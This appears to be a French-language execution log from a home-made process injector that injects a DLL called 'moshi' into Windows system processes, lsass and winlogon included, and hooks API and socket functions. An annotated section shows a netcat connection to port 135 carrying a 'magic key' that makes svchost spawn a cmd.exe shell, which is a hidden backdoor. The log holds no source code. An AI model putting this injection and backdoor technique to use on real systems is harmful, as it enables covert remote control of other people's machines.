
Process Injector 1.0 - Tolwin

Tentative d'attribution de privilege debug : 
succes

Erreur avec le processus [System Process] - 0
Erreur avec le processus System - 4
Erreur avec le processus smss.exe - 556
Succes avec le processus csrss.exe - 620
Succes avec le processus winlogon.exe - 644
Succes avec le processus services.exe - 688
Succes avec le processus lsass.exe - 700
Succes avec le processus svchost.exe - 876
Succes avec le processus svchost.exe - 968
Succes avec le processus svchost.exe - 1140
Succes avec le processus svchost.exe - 1152
Succes avec le processus spoolsv.exe - 1296
Succes avec le processus VMwareService.exe - 1452
Succes avec le processus explorer.exe - 128
Succes avec le processus VMwareTray.exe - 316
Succes avec le processus VMwareUser.exe - 328
Succes avec le processus msmsgs.exe - 336
Succes avec le processus wuauclt.exe - 172
Succes avec le processus cmd.exe - 508
Succes avec le processus ntvdm.exe - 2032
Succes avec le processus aa.exe - 392
Injection globale reussie
           csrss.exe   620- chargement de moshi
           csrss.exe   620- kernel32.dll hook
           csrss.exe   620- kernel32.dll:LoadLibraryA hook succes
           csrss.exe   620- kernel32.dll:FreeLibrary hook succes
           csrss.exe   620- kernel32.dll:CreateProcessInternalW hook succes
           csrss.exe   620- ws2_32.dll hook
           csrss.exe   620- WS2_32.dll:recv non charge, hook impossible
           csrss.exe   620- ws2_32.dll:recv hook echec
           csrss.exe   620- WS2_32.dll:WSARecv non charge, hook impossible
           csrss.exe   620- ws2_32.dll:WSARecv hook echec
           ntvdm.exe  2032- chargement de moshi
         wuauclt.exe   172- chargement de moshi
         svchost.exe   968- chargement de moshi
             cmd.exe   508- kernel32.dll hook
        explorer.exe   128- kernel32.dll hook
         svchost.exe   968- kernel32.dll hook
      VMwareUser.exe   328- kernel32.dll:LoadLibraryA hook succes
         wuauclt.exe   172- kernel32.dll:LoadLibraryA hook succes
         svchost.exe   968- kernel32.dll:LoadLibraryA ho                      
           ntvdm.exe  2032- ws2_32.dll hook
        explorer.exe   128- kernel32.dll:FreeLibrary hook succes
         svchost.exe   968- kernel32.dll:Free      
      VMwareUser.exe   328- w         wuauclt        
        services.exe   688- chargement de moshi
         svchost.exe   968- kernel32.dll:CreateProcessInternalW hook succes
         wuauclt.exe   172- ws2_32.dll hook
        services.exe   688- kernel32.dll:LoadLibraryA hook succes
         wuauclt.exe   172- ws2_32.dll:recv hook succes
             cmd.exe   508- ws2_32.dll:WSARecv hook echec
      VMwareUser.exe   328- ws2_32.dll:WSARecv hook echec
        services.exe   688- kernel32.dll:FreeLibrary hook succes
        services.exe   688- kernel32.dll:CreateProcessInternalW hook succes
        services.exe   688- ws2_32.dll hook
        services.exe   688- ws2_32.dll:recv hook succes
        services.exe   688- ws2_32.dll:WSARecv hook succes
         wuauclt.exe   172- ws2_32.dll:WSARecv hook succes
         spoolsv.exe  1296- chargement de moshi
         spoolsv.exe  1296- kernel32.dll hook
         spoolsv.exe  1296- kernel32.dll:LoadLibraryA hook succes
         spoolsv.exe  1296- kernel32.dll:FreeLibrary hook succes
         spoolsv.exe  1296- kernel32.dll:CreateProcessInternalW hook succes
         spoolsv.exe  1296- ws2_32.dll hook
         spoolsv.exe  1296- ws2_32.dll:recv hook succes
         spoolsv.exe  1296- ws2_32.dll:WSARecv hook succes
           lsass.exe   700- chargement de moshi
           lsass.exe   700- kernel32.dll hook
           lsass.exe   700- kernel32.dll:LoadLibraryA hook succes
           lsass.exe   700- kernel32.dll:FreeLibrary hook succes
           lsass.exe   700- kernel32.dll:CreateProcessInternalW hook succes
           lsass.exe   700- ws2_32.dll hook
           lsass.exe   700- ws2_32.dll:recv hook succes
           lsass.exe   700- ws2_32.dll:WSARecv hook succes
         svchost.exe   968- ws2_32.dll:recv hook succes
         svchost.exe   968- ws2_32.dll:WSARecv hook succes
        explorer.exe   128- ws2_32.dll:recv hook succes
        explorer.exe   128- ws2_32.dll:WSARecv hook succes
      VMwareTray.exe   316- chargement de moshi
      VMwareTray.exe   316- kernel32.dll hook
      VMwareTray.exe   316- kernel32.dll:LoadLibraryA hook succes
      VMwareTray.exe   316- kernel32.dll:FreeLibrary hook succes
      VMwareTray.exe   316- kernel32.dll:CreateProcessInternalW hook succes
      VMwareTray.exe   316- ws2_32.dll hook
      VMwareTray.exe   316- WS2_32.dll:recv non charge, hook impossible
      VMwareTray.exe   316- ws2_32.dll:recv hook echec
      VMwareTray.exe   316- WS2_32.dll:WSARecv non charge, hook impossible
      VMwareTray.exe   316- ws2_32.dll:WSARecv hook echec
   VMwareService.exe  1452- chargement de moshi
   VMwareService.exe  1452- kernel32.dll hook
   VMwareService.exe  1452- kernel32.dll:LoadLibraryA hook succes
   VMwareService.exe  1452- kernel32.dll:FreeLibrary hook succes
   VMwareService.exe  1452- kernel32.dll:CreateProcessInternalW hook succes
   VMwareService.exe  1452- ws2_32.dll hook
   VMwareService.exe  1452- ws2_32.dll:recv hook succes
   VMwareService.exe  1452- ws2_32.dll:WSARecv hook succes
         svchost.exe   876- chargement de moshi
         svchost.exe   876- kernel32.dll hook
         svchost.exe   876- kernel32.dll:LoadLibraryA hook succes
         svchost.exe   876- kernel32.dll:FreeLibrary hook succes
         svchost.exe   876- kernel32.dll:CreateProcessInternalW hook succes
         svchost.exe   876- ws2_32.dll hook
         svchost.exe   876- ws2_32.dll:recv hook succes
         svchost.exe   876- ws2_32.dll:WSARecv hook succes
        explorer.exe   128- appel  LoadLibraryA -> browseui.dll
        explorer.exe   128- appel  FreeLibrary -> ?
          msmsgs.exe   336- chargement de moshi
          msmsgs.exe   336- kernel32.dll hook
          msmsgs.exe   336- kernel32.dll:LoadLibraryA hook succes
          msmsgs.exe   336- kernel32.dll:FreeLibrary hook succes
          msmsgs.exe   336- kernel32.dll:CreateProcessInternalW hook succes
          msmsgs.exe   336- ws2_32.dll hook
          msmsgs.exe   336- ws2_32.dll:recv hook succes
          msmsgs.exe   336- ws2_32.dll:WSARecv hook succes
      VMwareTray.exe   316- appel  LoadLibraryA -> advapi32.dll
      VMwareTray.exe   316- appel  FreeLibrary -> ?
      VMwareTray.exe   316- appel  LoadLibraryA -> advapi32.dll
      VMwareTray.exe   316- appel  FreeLibrary -> ?
      VMwareTray.exe   316- appel  LoadLibraryA -> advapi32.dll
      VMwareTray.exe   316- appel  FreeLibrary -> ?
      VMwareTray.exe   316- appel  LoadLibraryA -> advapi32.dll
      VMwareTray.exe   316- appel  FreeLibrary -> ?
      VMwareTray.exe   316- appel  LoadLibraryA -> advapi32.dll
      VMwareTray.exe   316- appel  FreeLibrary -> ?
      VMwareTray.exe   316- appel  LoadLibraryA -> advapi32.dll
      VMwareTray.exe   316- appel  FreeLibrary -> ?

***** ***** C'est ici que ca se passe ***** *****

	1) Lancement de netcat
             cmd.exe   508- appel  CreateProcessInternalW -> 1976:nc localhost 135

	2) NetCat se fait parasiter
              nc.exe  1976- chargement de moshi
              nc.exe  1976- kernel32.dll hook
              nc.exe  1976- kernel32.dll:LoadLibraryA hook succes
              nc.exe  1976- kernel32.dll:FreeLibrary hook succes
              nc.exe  1976- kernel32.dll:CreateProcessInternalW hook succes
              nc.exe  1976- ws2_32.dll hook
              nc.exe  1976- ws2_32.dll:recv hook succes
              nc.exe  1976- ws2_32.dll:WSARecv hook succes

	3) Netcat charge ses dependences
              nc.exe  1976- appel  LoadLibraryA -> C:\WINDOWS\System32\mswsock.dll
              nc.exe  1976- appel  LoadLibraryA -> DNSAPI.dll
              nc.exe  1976- appel  LoadLibraryA -> C:\WINDOWS\System32\winrnr.dll
              nc.exe  1976- appel  LoadLibraryA -> C:\WINDOWS\System32\mswsock.dll
              nc.exe  1976- appel  LoadLibraryA -> rasadhlp.dll
              nc.exe  1976- appel  LoadLibraryA -> C:\WINDOWS\system32\mswsock.dll
              nc.exe  1976- appel  LoadLibraryA -> C:\WINDOWS\System32\mswsock.dll

	4) Svchost ecoute sur le port 135
         svchost.exe   876- Appel a WSARecv : 1 buffers, completion routine 0x00000000
         svchost.exe   876- Appel a WSARecv : ReturnVal -1
         svchost.exe   876- Appel a WSARecv : 1 buffers, completion routine 0x00000000
         svchost.exe   876- Appel a WSARecv : ReturnVal -1

	5) Ce coup ci est la bonne : svchost execute le shell
         svchost.exe   876- WSARecv (err / pending) detecte magic key dans buffer 0 avant l'offset
         svchost.exe   876- appel  CreateProcessInternalW -> 440:cmd.exe

	6) Le shell est contamin
             cmd.exe   440- chargement de moshi
             cmd.exe   440- kernel32.dll hook
             cmd.exe   440- kernel32.dll:LoadLibraryA hook succes
             cmd.exe   440- kernel32.dll:FreeLibrary hook succes
             cmd.exe   440- kernel32.dll:CreateProcessInternalW hook succes
             cmd.exe   440- ws2_32.dll hook
             cmd.exe   440- WS2_32.dll:recv non charge, hook impossible
             cmd.exe   440- ws2_32.dll:recv hook echec
             cmd.exe   440- WS2_32.dll:WSARecv non charge, hook impossible
             cmd.exe   440- ws2_32.dll:WSARecv hook echec
             cmd.exe   440- appel  LoadLibraryA -> ADVAPI32.dll
              nc.exe  1976- Appel a WSARecv : 1 buffers, completion routine 0x00000000
              nc.exe  1976- Appel a WSARecv : ReturnVal 0

	7) On quite le shell
             cmd.exe   440- fermeture de moshi
             cmd.exe   440- kernel32.dll libration
              nc.exe  1976- Appel a WSARecv : 1 buffers, completion routine 0x00000000
              nc.exe  1976- Appel a WSARecv : ReturnVal 0
         svchost.exe   876- Appel a WSARecv : 1 buffers, completion routine 0x00000000
         svchost.exe   876- Appel a WSARecv : ReturnVal -1

	8) Et NetCat se ferme dans la foule
              nc.exe  1976- fermeture de moshi
              nc.exe  1976- kernel32.dll libration

	9) On ferme la ligne de commande ayant lanc netcat
             cmd.exe   508- fermeture de moshi
             cmd.exe   508- kernel32.dll libration

***** ***** Fin de la partie a looker ***** *****

        explorer.exe   128- appel  LoadLibraryA -> browseui.dll
        explorer.exe   128- appel  FreeLibrary -> ?
        explorer.exe   128- appel  LoadLibraryA -> browseui.dll
        explorer.exe   128- appel  FreeLibrary -> ?
      VMwareTray.exe   316- appel  LoadLibraryA -> advapi32.dll
      VMwareTray.exe   316- appel  FreeLibrary -> ?
      VMwareTray.exe   316- appel  LoadLibraryA -> advapi32.dll
      VMwareTray.exe   316- appel  FreeLibrary -> ?
      VMwareTray.exe   316- appel  LoadLibraryA -> advapi32.dll
      VMwareTray.exe   316- appel  FreeLibrary -> ?
        explorer.exe   128- appel  LoadLibraryA -> MSGINA.dll
        explorer.exe   128- appel  LoadLibraryA -> MSIMG32.dll
        explorer.exe   128- appel  FreeLibrary -> ?
        explorer.exe   128- appel  LoadLibraryA -> browseui.dll
        explorer.exe   128- appel  FreeLibrary -> ?
        explorer.exe   128- appel  LoadLibraryA -> WINSTA.dll
      VMwareTray.exe   316- appel  LoadLibraryA -> advapi32.dll
      VMwareTray.exe   316- appel  FreeLibrary -> ?
      VMwareTray.exe   316- appel  LoadLibraryA -> advapi32.dll
      VMwareTray.exe   316- appel  FreeLibrary -> ?
      VMwareTray.exe   316- appel  LoadLibraryA -> advapi32.dll
      VMwareTray.exe   316- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  CreateProcessInternalW -> 1812:logonui.exe /status /shutdown
         logonui.exe  1812- chargement de moshi
         logonui.exe  1812- kernel32.dll hook
         logonui.exe  1812- kernel32.dll:LoadLibraryA hook succes
         logonui.exe  1812- kernel32.dll:FreeLibrary hook succes
         logonui.exe  1812- kernel32.dll:CreateProcessInternalW hook succes
         logonui.exe  1812- ws2_32.dll hook
         logonui.exe  1812- WS2_32.dll:recv non charge, hook impossible
         logonui.exe  1812- ws2_32.dll:recv hook echec
         logonui.exe  1812- WS2_32.dll:WSARecv non charge, hook impossible
         logonui.exe  1812- ws2_32.dll:WSARecv hook echec
         logonui.exe  1812- appel  FreeLibrary -> ?
         logonui.exe  1812- appel  FreeLibrary -> ?
         logonui.exe  1812- appel  LoadLibraryA -> user32.dll
         logonui.exe  1812- appel  LoadLibraryA -> UxTheme.dll
         logonui.exe  1812- appel  LoadLibraryA -> CLBCATQ.DLL
         logonui.exe  1812- appel  LoadLibraryA -> CLBCATQ.DLL
         logonui.exe  1812- appel  LoadLibraryA -> WINSTA.dll
         logonui.exe  1812- appel  LoadLibraryA -> NETAPI32.dll
        explorer.exe   128- appel  LoadLibraryA -> browseui.dll
        explorer.exe   128- appel  LoadLibraryA -> browseui.dll
        explorer.exe   128- appel  FreeLibrary -> ?
        explorer.exe   128- appel  FreeLibrary -> ?
        explorer.exe   128- appel  FreeLibrary -> ?
        explorer.exe   128- appel  LoadLibraryA -> browseui.dll
        explorer.exe   128- appel  FreeLibrary -> ?
        explorer.exe   128- appel  LoadLibraryA -> browseui.dll
        explorer.exe   128- appel  FreeLibrary -> ?
        explorer.exe   128- appel  FreeLibrary -> ?
        explorer.exe   128- appel  LoadLibraryA -> browseui.dll
        explorer.exe   128- appel  FreeLibrary -> ?
        explorer.exe   128- appel  FreeLibrary -> ?
        explorer.exe   128- appel  FreeLibrary -> ?
        explorer.exe   128- appel  FreeLibrary -> ?
        explorer.exe   128- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  LoadLibraryA -> WS2_32.dll
        winlogon.exe   644- ws2_32.dll hook
        winlogon.exe   644- ws2_32.dll:recv hook succes
        winlogon.exe   644- ws2_32.dll:WSARecv hook succes
        winlogon.exe   644- appel  LoadLibraryA -> WLDAP32.dll
         svchost.exe   968- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  LoadLibraryA -> CLBCATQ.DLL
        winlogon.exe   644- appel  LoadLibraryA -> CLBCATQ.DLL
        winlogon.exe   644- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  LoadLibraryA -> shfolder.dll
        winlogon.exe   644- appel  LoadLibraryA -> shell32.dll
        winlogon.exe   644- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  LoadLibraryA -> MPRUI.dll
        winlogon.exe   644- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  FreeLibrary -> ?
         svchost.exe   968- appel  CreateProcessInternalW -> 616:rundll32.exe shell32.dll,Activate_RunDLL
        rundll32.exe   616- chargement de moshi
        rundll32.exe   616- kernel32.dll hook
        rundll32.exe   616- kernel32.dll:LoadLibraryA hook succes
        rundll32.exe   616- kernel32.dll:FreeLibrary hook succes
        rundll32.exe   616- kernel32.dll:CreateProcessInternalW hook succes
        rundll32.exe   616- ws2_32.dll hook
        rundll32.exe   616- WS2_32.dll:recv non charge, hook impossible
        rundll32.exe   616- ws2_32.dll:recv hook echec
        rundll32.exe   616- WS2_32.dll:WSARecv non charge, hook impossible
        rundll32.exe   616- ws2_32.dll:WSARecv hook echec
        rundll32.exe   616- appel  FreeLibrary -> ?
        rundll32.exe   616- appel  FreeLibrary -> ?
        rundll32.exe   616- appel  FreeLibrary -> ?
        rundll32.exe   616- appel  FreeLibrary -> ?
        rundll32.exe   616- appel  FreeLibrary -> ?
        rundll32.exe   616- fermeture de moshi
        rundll32.exe   616- kernel32.dll libration
        winlogon.exe   644- appel  LoadLibraryA -> RASAPI32.dll
        winlogon.exe   644- appel  FreeLibrary -> ?
   VMwareService.exe  1452- appel  FreeLibrary -> ?
         spoolsv.exe  1296- fermeture de moshi
         spoolsv.exe  1296- kernel32.dll libration
   VMwareService.exe  1452- appel  FreeLibrary -> ?
   VMwareService.exe  1452- appel  FreeLibrary -> ?
           lsass.exe   700- appel  FreeLibrary -> ?
           lsass.exe   700- appel  FreeLibrary -> ?
   VMwareService.exe  1452- appel  FreeLibrary -> ?
   VMwareService.exe  1452- appel  LoadLibraryA -> USER32.dll
   VMwareService.exe  1452- fermeture de moshi
   VMwareService.exe  1452- kernel32.dll libration
         svchost.exe   968- appel  FreeLibrary -> ?
         svchost.exe   968- appel  FreeLibrary -> ?
         svchost.exe   968- appel  FreeLibrary -> ?
         svchost.exe   968- appel  FreeLibrary -> ?
         svchost.exe   968- appel  FreeLibrary -> ?
         svchost.exe   968- appel  FreeLibrary -> ?
         svchost.exe   968- appel  FreeLibrary -> ?
         svchost.exe   968- appel  FreeLibrary -> ?
         svchost.exe   968- appel  FreeLibrary -> ?
         svchost.exe   968- appel  FreeLibrary -> ?
         svchost.exe   968- appel  FreeLibrary -> ?
         svchost.exe   968- appel  FreeLibrary -> ?
         svchost.exe   968- appel  FreeLibrary -> ?
         wuauclt.exe   172- appel  FreeLibrary -> ?
         wuauclt.exe   172- appel  FreeLibrary -> ?
         svchost.exe   968- appel  FreeLibrary -> ?
         wuauclt.exe   172- appel  FreeLibrary -> ?
         wuauclt.exe   172- appel  FreeLibrary -> ?
         wuauclt.exe   172- fermeture de moshi
         wuauclt.exe   172- kernel32.dll libration
